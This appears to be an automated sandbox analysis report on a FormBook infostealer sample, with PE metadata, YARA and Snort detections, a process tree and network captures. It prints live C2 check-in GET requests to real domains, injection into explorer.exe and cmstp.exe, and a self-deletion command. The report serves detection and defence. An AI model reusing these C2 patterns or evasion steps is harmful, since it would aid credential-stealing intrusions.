                                        Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                                        DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                        Time Stamp:0x627DE1F1 [Fri May 13 04:43:29 2022 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:v4.0.30319
                                        OS Version Major:4
                                        OS Version Minor:0
                                        File Version Major:4
                                        File Version Minor:0
                                        Subsystem Version Major:4
                                        Subsystem Version Minor:0
                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                        Entrypoint Preview

                                        Instruction
                                        jmp dword ptr [00402000h]
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al

                                        Data Directories

                                        NameVirtual AddressVirtual Size Is in Section
                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x9a2700x4b.text
                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x9c0000x3c38.rsrc
                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0xa00000xc.reloc
                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x9a21c0x1c.text
                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                        Sections

                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                        .text0x20000x982c40x98400False0.862261391626data7.72747835774IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                        .rsrc0x9c0000x3c380x3e00False0.928553427419data7.66198147209IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .reloc0xa00000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                        Resources

                                        NameRVASizeTypeLanguageCountry
                                        RT_ICON0x9c0e80x37d6PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                        RT_GROUP_ICON0x9f8c00x14data
                                        RT_VERSION0x9f8d40x364data

                                        Imports

                                        DLLImport
                                        mscoree.dll_CorExeMain

                                        Version Infos

                                        DescriptionData
                                        Translation0x0000 0x04b0
                                        LegalCopyrightCopyright 2017
                                        Assembly Version1.0.0.0
                                        InternalNameAuthorizationRuleCollect.exe
                                        FileVersion1.0.0.0
                                        CompanyName
                                        LegalTrademarks
                                        Comments
                                        ProductNameResetEvent
                                        ProductVersion1.0.0.0
                                        FileDescriptionResetEvent
                                        OriginalFilenameAuthorizationRuleCollect.exe

                                        Network Behavior

                                        Snort IDS Alerts

                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                        192.168.2.38.8.8.851518532023883 05/14/22-13:13:06.533808UDP2023883ET DNS Query to a *.top domain - Likely Hostile5151853192.168.2.38.8.8.8
                                        192.168.2.3209.17.116.16349806802031412 05/14/22-13:12:56.292892TCP2031412ET TROJAN FormBook CnC Checkin (GET)4980680192.168.2.3209.17.116.163
                                        192.168.2.3209.17.116.16349806802031449 05/14/22-13:12:56.292892TCP2031449ET TROJAN FormBook CnC Checkin (GET)4980680192.168.2.3209.17.116.163
                                        192.168.2.3209.17.116.16349806802031453 05/14/22-13:12:56.292892TCP2031453ET TROJAN FormBook CnC Checkin (GET)4980680192.168.2.3209.17.116.163

                                        Network Port Distribution

                                        TCP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        May 14, 2022 13:12:56.176590919 CEST4980680192.168.2.3209.17.116.163
                                        May 14, 2022 13:12:56.292612076 CEST8049806209.17.116.163192.168.2.3
                                        May 14, 2022 13:12:56.292799950 CEST4980680192.168.2.3209.17.116.163
                                        May 14, 2022 13:12:56.292891979 CEST4980680192.168.2.3209.17.116.163
                                        May 14, 2022 13:12:56.410032034 CEST8049806209.17.116.163192.168.2.3
                                        May 14, 2022 13:12:56.410089016 CEST8049806209.17.116.163192.168.2.3
                                        May 14, 2022 13:12:56.410192013 CEST4980680192.168.2.3209.17.116.163
                                        May 14, 2022 13:12:56.410259962 CEST4980680192.168.2.3209.17.116.163
                                        May 14, 2022 13:12:56.526056051 CEST8049806209.17.116.163192.168.2.3
                                        May 14, 2022 13:13:01.478405952 CEST4980880192.168.2.3172.217.168.19
                                        May 14, 2022 13:13:01.494436026 CEST8049808172.217.168.19192.168.2.3
                                        May 14, 2022 13:13:01.495452881 CEST4980880192.168.2.3172.217.168.19
                                        May 14, 2022 13:13:01.498105049 CEST4980880192.168.2.3172.217.168.19
                                        May 14, 2022 13:13:01.513856888 CEST8049808172.217.168.19192.168.2.3
                                        May 14, 2022 13:13:01.527266026 CEST8049808172.217.168.19192.168.2.3
                                        May 14, 2022 13:13:01.527288914 CEST8049808172.217.168.19192.168.2.3
                                        May 14, 2022 13:13:01.527462006 CEST4980880192.168.2.3172.217.168.19
                                        May 14, 2022 13:13:01.527553082 CEST4980880192.168.2.3172.217.168.19
                                        May 14, 2022 13:13:01.543385983 CEST8049808172.217.168.19192.168.2.3
                                        May 14, 2022 13:13:07.044441938 CEST4981080192.168.2.3180.76.158.103
                                        May 14, 2022 13:13:10.046093941 CEST4981080192.168.2.3180.76.158.103
                                        May 14, 2022 13:13:16.062084913 CEST4981080192.168.2.3180.76.158.103
                                        May 14, 2022 13:13:30.076956034 CEST4983680192.168.2.3180.76.158.103
                                        May 14, 2022 13:13:33.079175949 CEST4983680192.168.2.3180.76.158.103
                                        May 14, 2022 13:13:39.095287085 CEST4983680192.168.2.3180.76.158.103

                                        UDP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        May 14, 2022 13:12:56.050158024 CEST4984453192.168.2.38.8.8.8
                                        May 14, 2022 13:12:56.171458006 CEST53498448.8.8.8192.168.2.3
                                        May 14, 2022 13:13:01.430006981 CEST6386153192.168.2.38.8.8.8
                                        May 14, 2022 13:13:01.477284908 CEST53638618.8.8.8192.168.2.3
                                        May 14, 2022 13:13:06.533807993 CEST5151853192.168.2.38.8.8.8
                                        May 14, 2022 13:13:07.042562962 CEST53515188.8.8.8192.168.2.3
                                        May 14, 2022 13:13:29.585231066 CEST4972353192.168.2.38.8.8.8
                                        May 14, 2022 13:13:30.045614958 CEST53497238.8.8.8192.168.2.3
                                        May 14, 2022 13:13:33.080382109 CEST5258153192.168.2.38.8.8.8
                                        May 14, 2022 13:13:33.120031118 CEST53525818.8.8.8192.168.2.3
                                        May 14, 2022 13:13:38.129200935 CEST5015253192.168.2.38.8.8.8
                                        May 14, 2022 13:13:38.153343916 CEST53501528.8.8.8192.168.2.3

                                        DNS Queries

                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                        May 14, 2022 13:12:56.050158024 CEST192.168.2.38.8.8.80xbea6Standard query (0)www.royaltortoisecookieco.onlineA (IP address)IN (0x0001)
                                        May 14, 2022 13:13:01.430006981 CEST192.168.2.38.8.8.80x104bStandard query (0)www.gratefulgrandmas.comA (IP address)IN (0x0001)
                                        May 14, 2022 13:13:06.533807993 CEST192.168.2.38.8.8.80x3ebcStandard query (0)www.zhouyihong.topA (IP address)IN (0x0001)
                                        May 14, 2022 13:13:29.585231066 CEST192.168.2.38.8.8.80x9186Standard query (0)www.zhouyihong.topA (IP address)IN (0x0001)
                                        May 14, 2022 13:13:33.080382109 CEST192.168.2.38.8.8.80xbeaStandard query (0)www.ivyleaguereading.comA (IP address)IN (0x0001)
                                        May 14, 2022 13:13:38.129200935 CEST192.168.2.38.8.8.80x8b1bStandard query (0)www.quinten-and-sam.comA (IP address)IN (0x0001)

                                        DNS Answers

                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                        May 14, 2022 13:12:56.171458006 CEST8.8.8.8192.168.2.30xbea6No error (0)www.royaltortoisecookieco.online209.17.116.163A (IP address)IN (0x0001)
                                        May 14, 2022 13:13:01.477284908 CEST8.8.8.8192.168.2.30x104bNo error (0)www.gratefulgrandmas.comghs.googlehosted.comCNAME (Canonical name)IN (0x0001)
                                        May 14, 2022 13:13:01.477284908 CEST8.8.8.8192.168.2.30x104bNo error (0)ghs.googlehosted.com172.217.168.19A (IP address)IN (0x0001)
                                        May 14, 2022 13:13:07.042562962 CEST8.8.8.8192.168.2.30x3ebcNo error (0)www.zhouyihong.top180.76.158.103A (IP address)IN (0x0001)
                                        May 14, 2022 13:13:30.045614958 CEST8.8.8.8192.168.2.30x9186No error (0)www.zhouyihong.top180.76.158.103A (IP address)IN (0x0001)
                                        May 14, 2022 13:13:33.120031118 CEST8.8.8.8192.168.2.30xbeaName error (3)www.ivyleaguereading.comnonenoneA (IP address)IN (0x0001)
                                        May 14, 2022 13:13:38.153343916 CEST8.8.8.8192.168.2.30x8b1bNo error (0)www.quinten-and-sam.com3.93.205.129A (IP address)IN (0x0001)
                                        May 14, 2022 13:13:38.153343916 CEST8.8.8.8192.168.2.30x8b1bNo error (0)www.quinten-and-sam.com54.198.222.183A (IP address)IN (0x0001)
                                        May 14, 2022 13:13:38.153343916 CEST8.8.8.8192.168.2.30x8b1bNo error (0)www.quinten-and-sam.com100.24.89.80A (IP address)IN (0x0001)
                                        May 14, 2022 13:13:38.153343916 CEST8.8.8.8192.168.2.30x8b1bNo error (0)www.quinten-and-sam.com18.211.19.104A (IP address)IN (0x0001)
                                        May 14, 2022 13:13:38.153343916 CEST8.8.8.8192.168.2.30x8b1bNo error (0)www.quinten-and-sam.com52.71.193.116A (IP address)IN (0x0001)
                                        May 14, 2022 13:13:38.153343916 CEST8.8.8.8192.168.2.30x8b1bNo error (0)www.quinten-and-sam.com3.234.11.211A (IP address)IN (0x0001)

                                        HTTP Request Dependency Graph

                                        • www.royaltortoisecookieco.online
                                        • www.gratefulgrandmas.com

                                        HTTP Packets

                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        0192.168.2.349806209.17.116.16380C:\Windows\explorer.exe
                                        TimestampkBytes transferredDirectionData
                                        May 14, 2022 13:12:56.292891979 CEST10287OUTGET /gfge/?-ZEhG=0pO83p&atm=bkTODcW29ZLLFsJ1z0hFzGOlzA/dTRh9UhQLTYc1zt8rWVzKVHP86zdm8t9X8OCiEKYk HTTP/1.1
                                        Host: www.royaltortoisecookieco.online
                                        Connection: close
                                        Data Raw: 00 00 00 00 00 00 00
                                        Data Ascii:
                                        May 14, 2022 13:12:56.410032034 CEST10288INHTTP/1.1 400 Bad Request
                                        Server: openresty/1.19.9.1
                                        Date: Sat, 14 May 2022 11:12:56 GMT
                                        Content-Type: text/html
                                        Content-Length: 163
                                        Connection: close
                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 39 2e 39 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty/1.19.9.1</center></body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        1192.168.2.349808172.217.168.1980C:\Windows\explorer.exe
                                        TimestampkBytes transferredDirectionData
                                        May 14, 2022 13:13:01.498105049 CEST10529OUTGET /gfge/?atm=Z4UEWxzHsbgHCWzNn0OH8uguYAGXLulTgu05WjhJOdFN0vK06536biQ9Uf++w6wnfUsW&-ZEhG=0pO83p HTTP/1.1
                                        Host: www.gratefulgrandmas.com
                                        Connection: close
                                        Data Raw: 00 00 00 00 00 00 00
                                        Data Ascii:
                                        May 14, 2022 13:13:01.527266026 CEST10814INHTTP/1.1 302 Found
                                        Location: https://www.gratitudeaddict.com/
                                        Date: Sat, 14 May 2022 11:13:01 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Server: ghs
                                        Content-Length: 229
                                        X-XSS-Protection: 0
                                        X-Frame-Options: SAMEORIGIN
                                        Connection: close
                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 72 61 74 69 74 75 64 65 61 64 64 69 63 74 2e 63 6f 6d 2f 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                        Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.gratitudeaddict.com/">here</A>.</BODY></HTML>


                                        Statistics

                                        Behavior

                                        Click to jump to process

                                        System Behavior

                                        General

                                        Target ID:0
                                        Start time:13:11:26
                                        Start date:14/05/2022
                                        Path:C:\Users\user\Desktop\Quoted Items.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\Desktop\Quoted Items.exe"
                                        Imagebase:0xbf0000
                                        File size:640512 bytes
                                        MD5 hash:901567A408D891FC0F67E15221D1B7E4
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:.Net C# or VB.NET
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.287722353.000000000402A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.287722353.000000000402A000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.287722353.000000000402A000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.286733005.0000000002F61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        Reputation:low

                                        General

                                        Target ID:4
                                        Start time:13:11:39
                                        Start date:14/05/2022
                                        Path:C:\Users\user\Desktop\Quoted Items.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Users\user\Desktop\Quoted Items.exe
                                        Imagebase:0x600000
                                        File size:640512 bytes
                                        MD5 hash:901567A408D891FC0F67E15221D1B7E4
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.350947066.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.350947066.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.350947066.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.351326281.0000000000C10000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.351326281.0000000000C10000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.351326281.0000000000C10000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.278783725.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.278783725.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.278783725.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.277402200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.277402200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.277402200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.351362471.0000000000C50000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.351362471.0000000000C50000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.351362471.0000000000C50000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                        Reputation:low

                                        General

                                        Target ID:5
                                        Start time:13:11:45
                                        Start date:14/05/2022
                                        Path:C:\Windows\explorer.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\Explorer.EXE
                                        Imagebase:0x7ff6b8cf0000
                                        File size:3933184 bytes
                                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.316596581.000000000D158000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.316596581.000000000D158000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.316596581.000000000D158000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.338397807.000000000D158000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.338397807.000000000D158000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.338397807.000000000D158000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                        Reputation:high

                                        General

                                        Target ID:16
                                        Start time:13:12:11
                                        Start date:14/05/2022
                                        Path:C:\Windows\SysWOW64\cmstp.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\cmstp.exe
                                        Imagebase:0x1230000
                                        File size:82944 bytes
                                        MD5 hash:4833E65ED211C7F118D4A11E6FB58A09
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.515431699.0000000003370000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.515431699.0000000003370000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.515431699.0000000003370000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.514085622.0000000000DB0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.514085622.0000000000DB0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.514085622.0000000000DB0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.515850944.0000000004D70000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.515850944.0000000004D70000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.515850944.0000000004D70000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                        Reputation:moderate

                                        General

                                        Target ID:18
                                        Start time:13:12:15
                                        Start date:14/05/2022
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:/c del "C:\Users\user\Desktop\Quoted Items.exe"
                                        Imagebase:0xc20000
                                        File size:232960 bytes
                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        General

                                        Target ID:19
                                        Start time:13:12:16
                                        Start date:14/05/2022
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7c9170000
                                        File size:625664 bytes
                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        Disassembly

                                        No disassembly